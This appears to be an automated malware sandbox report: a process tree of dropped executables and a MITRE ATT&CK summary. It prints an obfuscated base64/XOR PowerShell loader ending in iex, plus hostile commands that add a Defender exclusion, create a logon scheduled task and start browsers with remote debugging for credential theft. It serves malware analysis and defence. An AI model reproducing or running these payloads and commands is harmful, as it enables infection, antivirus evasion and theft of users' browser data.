ZwBXAEUAVABnAGkAUABTAFkAVABLAEIAYwA1AEoARwBFADgASQBRAEEASQBFAHoAOABMAE4ASAAwADIARAAzADQAVwBNAEQAMAB5AFAAbQBRAE4AQwBSADgAKwBIAEEAUQBXAE8AVABzADkARABDAFkAVQBRAGcAcwBqAEgAMgBBAFcAUAB3AHcATABQAFMAWQBMAE4ASAAwADIARAAzADQAVwBNAEQAMAB5AFAAbQBRAE4AQwBSADgAbwBKAHcAVQBzAGUAegBzAGMASwBtAG8ATABNAHcAUQA2AEQAbgBVAFcATQBUADAAaQBQAFMAWQBtAEsAQQBOAGsAQwBWAG8AVwBJAFQAcABYAEgAeAB3AGIASgAzAHcAOQBEAGwATQBQAEwAagA0AG0ASQBtAFEATgBRAHgAOABvAEkARwBVAEcAZgBoAFkAYwBPAFQAawBnAEgAWABnAC8ASAAyAEUAdwBNAFIAQQBoAFcAegBRAFgASABSAHMALwBKAEcANABLAGUAUQBNADkASQBpAGMAWABRAGcATQArAEgAMgBFAFcAZQBEAHMAaQBQAFQAZwBVAE4AdwBzAHIASgBFADgARgBQAFEAZwB5AEoAVwBNAGoASgAzAFEAawBEAEgAVQBXAFAAVABoAFgARAB5AFUAbgBLAEEAZwAyAEMAVwBBAFcATQBEAGcAeQBEAHoAMABZAEsAQQBRADIARgBIAFUAagBJAGoAZwB0AEoAUwBNAGIAUQB4AHcAaQBEAEgAVQBXAEkAZwBCAFcAQgB5AFkAagBHAFMAWQAyAEMAVwBBAEcATQBEAGcAeQBYAGoAawBqAEsAQQA4ADUASgAzAFUARgBJAGcAQQA5AEIAegA4AGIASABpAFYAawBJAFcAVQBGAFAAUQB4AFgAUABXAE0AbQBOAHkARQBrAEgAdwBVAEoATABoAE0AaQBBAHoAawBZAE4AeQBFAGwASQBIAFUARgBQAFEAOABpAEwAUwBrAGoAUQBIAGcANQBKADIARQBSAEwAaABNAHQASQBTAFUAbgBPAEIAYwBuAEQASABWADEASABBAEEAOQBKAFMARQBYAE4AdwB0AGgASgBIAFUARgBJAGoAdwBpAEIAeQBrAGgASABRAGMALwBJAFgAVQBGAFAAUQBzAGkAUABTAGsAYgBRAHcAYwBoAEoAbgA0AFcATwBUAHQAWABYAHoAUQBJAE4AeABzAGwASQBRAFUAVwBJAEEAQQBjAEsAaQBjAFEASABYAFEAbwBIAEEAUQBSAGYAaABaAFgAQgB6ADQATABNAHkAbwA2AEgAQQBSAHgAUABBAE4AWABQAFMARQBoAEkAeQBZADIASQBFADgARwBKAFQAdwBpAEIAMgBNAEwATgBBAHcAMgBJADIAVQBHAEoAVABzAHQASgBUADgATABPAEQANAAyAEgAMgA0AHMATwBUADAAbQBLAGkAcwBMAE8ASAAxAG0ASQAyAFUARwBJAHcAQQA5AE8AVABrAGoATQB3ADkAbQBEAEgARQBTAGYAVABnADkATwBqAFEAUABJAHcAOQBvAEMAZwBWADAAZgBnAE0AOQBBAHkATQBtAE0AdwB3AHAAJwA7ACQAbQB1AGcAbAA9ACcARQA2AEQASQBZAGUAawBTAEIAcABNAFEAJwA7ACQAagBlAHUAdABoAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAbABuAGwAbgApADsAJABxAGcAdwB3AGQAZQA9ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAAoAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABqAGUAdQB0AGgALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAagBlAHUAdABoAFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAbQB1AGcAbABbACQAaQAlACQAbQB1AGcAbAAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABxAGcAdwB3AGQAZQApACkAfABpAGUAeAA=
                                                                                          5⤵
                                                                                            PID:5908
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • Enumerates system info in registry
                                                                                        PID:5312
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:2816
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          schtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:5532
                                                                                        • C:\Program Files\runtime\COM Surrogate.exe
                                                                                          "C:\Program Files\runtime\COM Surrogate.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies system certificate store
                                                                                          PID:6056
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"
                                                                                        3⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Downloads MZ/PE file
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Checks processor information in registry
                                                                                        PID:4136
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                          4⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:8072
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe57d1cc40,0x7ffe57d1cc4c,0x7ffe57d1cc58
                                                                                            5⤵
                                                                                              PID:5484
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                            4⤵
                                                                                            • Uses browser remote debugging
                                                                                            • Enumerates system info in registry
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            PID:3052
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe49ae46f8,0x7ffe49ae4708,0x7ffe49ae4718
                                                                                              5⤵
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              PID:2880
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                              5⤵
                                                                                                PID:1628
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                                                                                                5⤵
                                                                                                  PID:1620
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
                                                                                                  5⤵
                                                                                                    PID:184
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                                                                                    5⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:1824
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                    5⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:5360
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
                                                                                                    5⤵
                                                                                                      PID:4360
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
                                                                                                      5⤵
                                                                                                        PID:6568
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2872 /prefetch:2
                                                                                                        5⤵
                                                                                                          PID:4904
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2536 /prefetch:2
                                                                                                          5⤵
                                                                                                            PID:4168
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:1
                                                                                                            5⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:5164
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
                                                                                                            5⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:7784
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2500 /prefetch:2
                                                                                                            5⤵
                                                                                                              PID:4500
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4920 /prefetch:2
                                                                                                              5⤵
                                                                                                                PID:5836
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3420 /prefetch:2
                                                                                                                5⤵
                                                                                                                  PID:6488
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4064 /prefetch:2
                                                                                                                  5⤵
                                                                                                                    PID:7244
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 2444
                                                                                                                  4⤵
                                                                                                                  • Program crash
                                                                                                                  PID:3060
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:8176
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:4320
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 800
                                                                                                                  4⤵
                                                                                                                  • Program crash
                                                                                                                  PID:6324
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5192
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:7420
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:4840
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                                                      6⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5140
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe"
                                                                                                                3⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3252
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10128000101\ADFoyxP.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10128000101\ADFoyxP.exe"
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in Windows directory
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2444
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4820
                                                                                                                  • C:\Windows\SysWOW64\expand.exe
                                                                                                                    expand Go.pub Go.pub.bat
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:6928
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                            1⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Identifies Wine through registry keys
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2492
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708
                                                                                                            1⤵
                                                                                                              PID:3084
                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                              1⤵
                                                                                                                PID:4860
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                1⤵
                                                                                                                  PID:5688
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4236 -ip 4236
                                                                                                                  1⤵
                                                                                                                    PID:2740
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                    1⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:6480
                                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                    1⤵
                                                                                                                      PID:5284
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 8176 -ip 8176
                                                                                                                      1⤵
                                                                                                                        PID:5616
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        1⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:7176
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4136 -ip 4136
                                                                                                                        1⤵
                                                                                                                          PID:5936

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Reconnaissance

                                                                                                                        Resource Development

                                                                                                                        Initial Access

                                                                                                                        Execution

                                                                                                                        Command and Scripting Interpreter

                                                                                                                        1
                                                                                                                        T1059

                                                                                                                        PowerShell

                                                                                                                        1
                                                                                                                        T1059.001

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Scheduled Task

                                                                                                                        1
                                                                                                                        T1053.005

                                                                                                                        Persistence

                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                        1
                                                                                                                        T1547

                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                        1
                                                                                                                        T1547.001

                                                                                                                        Create or Modify System Process

                                                                                                                        4
                                                                                                                        T1543

                                                                                                                        Windows Service

                                                                                                                        4
                                                                                                                        T1543.003

                                                                                                                        Modify Authentication Process

                                                                                                                        1
                                                                                                                        T1556

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Scheduled Task

                                                                                                                        1
                                                                                                                        T1053.005

                                                                                                                        Privilege Escalation

                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                        1
                                                                                                                        T1547

                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                        1
                                                                                                                        T1547.001

                                                                                                                        Create or Modify System Process

                                                                                                                        4
                                                                                                                        T1543

                                                                                                                        Windows Service

                                                                                                                        4
                                                                                                                        T1543.003

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Scheduled Task

                                                                                                                        1
                                                                                                                        T1053.005

                                                                                                                        Defense Evasion

                                                                                                                        Impair Defenses

                                                                                                                        5
                                                                                                                        T1562

                                                                                                                        Disable or Modify Tools

                                                                                                                        5
                                                                                                                        T1562.001

                                                                                                                        Modify Authentication Process

                                                                                                                        1
                                                                                                                        T1556

                                                                                                                        Modify Registry

                                                                                                                        7
                                                                                                                        T1112

                                                                                                                        Obfuscated Files or Information

                                                                                                                        1
                                                                                                                        T1027

                                                                                                                        Command Obfuscation

                                                                                                                        1
                                                                                                                        T1027.010

                                                                                                                        Subvert Trust Controls

                                                                                                                        1
                                                                                                                        T1553

                                                                                                                        Install Root Certificate

                                                                                                                        1
                                                                                                                        T1553.004

                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                        2
                                                                                                                        T1497

                                                                                                                        Credential Access

                                                                                                                        Credentials from Password Stores

                                                                                                                        1
                                                                                                                        T1555

                                                                                                                        Credentials from Web Browsers

                                                                                                                        1
                                                                                                                        T1555.003

                                                                                                                        Modify Authentication Process

                                                                                                                        1
                                                                                                                        T1556

                                                                                                                        Steal Web Session Cookie

                                                                                                                        1
                                                                                                                        T1539

                                                                                                                        Unsecured Credentials

                                                                                                                        5
                                                                                                                        T1552

                                                                                                                        Credentials In Files

                                                                                                                        5
                                                                                                                        T1552.001

                                                                                                                        Discovery

                                                                                                                        Browser Information Discovery

                                                                                                                        1
                                                                                                                        T1217

                                                                                                                        Query Registry

                                                                                                                        8
                                                                                                                        T1012

                                                                                                                        System Information Discovery

                                                                                                                        5
                                                                                                                        T1082

